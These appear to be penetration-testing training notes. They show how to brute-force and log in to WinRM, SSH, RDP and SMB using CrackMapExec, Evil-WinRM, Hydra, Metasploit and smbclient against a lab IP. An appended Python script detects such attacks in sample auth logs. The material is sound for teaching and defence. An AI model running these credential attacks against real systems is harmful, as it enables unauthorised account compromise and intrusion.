A handy tool that we can use for our password attacks is CrackMapExec, which can also be used for other protocols such as SMB, LDAP, MSSQL, and others. We recommend reading the official documentation for this tool to become familiar with it.
WinRM - Windows Remote Management Protocols
WinRM is a network protocol based on XML web services using the Simple Object Access Protocol (SOAP), used for remote management of Windows systems. It handles the communication between Web-Based Enterprise Management (WBEM) and Windows Management Instrumentation (WMI), which can call the Distributed Component Object Model (DCOM).
CrackMapExec
Installing CrackMapExec
sudo apt-get -y install crackmapexec
Note: Alternatively, we can install NetExec to follow along using sudo apt-get -y install netexec
Using CrackMapExec
Help:
crackmapexec -h
CrackMapExec Protocol-Specific Help:
crackmapexec smb -h
CrackMapExec Usage:
crackmapexec <proto> <target-IP> -u <user or userlist> -p <password or passwordlist>
Example for WinRM:
crackmapexec winrm 10.129.42.197 -u user.list -p password.list
Evil-WinRM
Installing Evil-WinRM:
sudo gem install evil-winrm
Usage:
evil-winrm -i <target-IP> -u <username> -p <password>
Example:
evil-winrm -i 10.129.42.197 -u user -p password

SSH - Linux Remote Management Protocols
Using Hydra to brute-force SSH:
hydra -L user.list -P password.list ssh://10.129.42.197

RDP - Windows Remote Management Protocols
Port : 3389
Using Hydra to brute-force RDP:
hydra -L user.list -P password.list rdp://10.129.42.197
xFreeRDP (from Linux):
xfreerdp /v:<target-IP> /u:<username> /p:<password>
Example:
xfreerdp /v:10.129.42.197 /u:user /p:password

SMB
Hydra - SMB
hydra -L user.list -P password.list smb://10.129.42.197
This may return:
[ERROR] invalid reply from target smb://10.129.42.197:445/
This is because we most likely have an outdated version of THC-Hydra that cannot handle SMBv3 replies. To work around this problem, we can manually update and recompile Hydra, or use another very powerful tool, the Metasploit Framework.
Metasploit Framework
use auxiliary/scanner/smb/smb_login
set user_file user.list
set pass_file password.list
set rhosts 10.129.42.197
run

CrackMapExec
crackmapexec smb 10.129.42.197 -u "user" -p "password" --shares

Smbclient
smbclient -U user \\\\10.129.42.197\\SHARENAME
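The list-based guessing shown above (one source working through user.list and password.list against SSH, WinRM, RDP and SMB) leaves a distinctive trail in authentication logs: a burst of failures from one address spread over many accounts, sometimes followed by a success. The following is an added example of the detection side, not part of the original notes; the sshd lines and the flattened Windows 4625/4624 records are constructed sample data, and the thresholds are assumptions to tune per environment.

```python
import re
from collections import defaultdict

# Constructed sample log lines (not real captures): sshd auth.log entries and
# flattened Windows failed/successful network logon records (4625/4624).
SAMPLE_LOGS = """\
Jan 10 10:00:01 host sshd[1201]: Failed password for invalid user admin from 10.129.42.50 port 51522 ssh2
Jan 10 10:00:02 host sshd[1203]: Failed password for invalid user bob from 10.129.42.50 port 51523 ssh2
Jan 10 10:00:03 host sshd[1205]: Failed password for alice from 10.129.42.50 port 51524 ssh2
Jan 10 10:00:04 host sshd[1207]: Failed password for root from 10.129.42.50 port 51525 ssh2
Jan 10 10:00:09 host sshd[1210]: Accepted password for alice from 10.129.42.50 port 51530 ssh2
Jan 10 10:05:00 host sshd[1300]: Failed password for carol from 192.168.1.7 port 40000 ssh2
EventID=4625 TargetUserName=user LogonType=3 IpAddress=10.129.42.50
EventID=4625 TargetUserName=svc_sql LogonType=3 IpAddress=10.129.42.50
EventID=4625 TargetUserName=backup LogonType=3 IpAddress=10.129.42.50
"""

SSH_RE = re.compile(
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<src>[\d.]+)")
WIN_RE = re.compile(
    r"EventID=(?P<id>4624|4625) TargetUserName=(?P<user>\S+) LogonType=3 "
    r"IpAddress=(?P<src>[\d.]+)")

def parse_line(line):
    """Return (src, user, success) for an auth event, or None for other lines."""
    m = SSH_RE.search(line)
    if m:
        return m["src"], m["user"], m["result"] == "Accepted"
    m = WIN_RE.search(line)
    if m:
        return m["src"], m["user"], m["id"] == "4624"
    return None

def analyze(text, max_failures=5, max_users=3):
    """Group auth events by source address and flag brute-force / spraying."""
    stats = defaultdict(
        lambda: {"failures": 0, "users": set(), "success_after_failures": []})
    for line in text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        src, user, ok = ev
        s = stats[src]
        if ok:
            if s["failures"] > 0:  # a hit after failed guesses: likely compromise
                s["success_after_failures"].append(user)
        else:
            s["failures"] += 1
            s["users"].add(user)
    for s in stats.values():
        # many failures = password brute force; many accounts = spraying (-L user.list)
        s["flagged"] = s["failures"] >= max_failures or len(s["users"]) >= max_users
    return dict(stats)
```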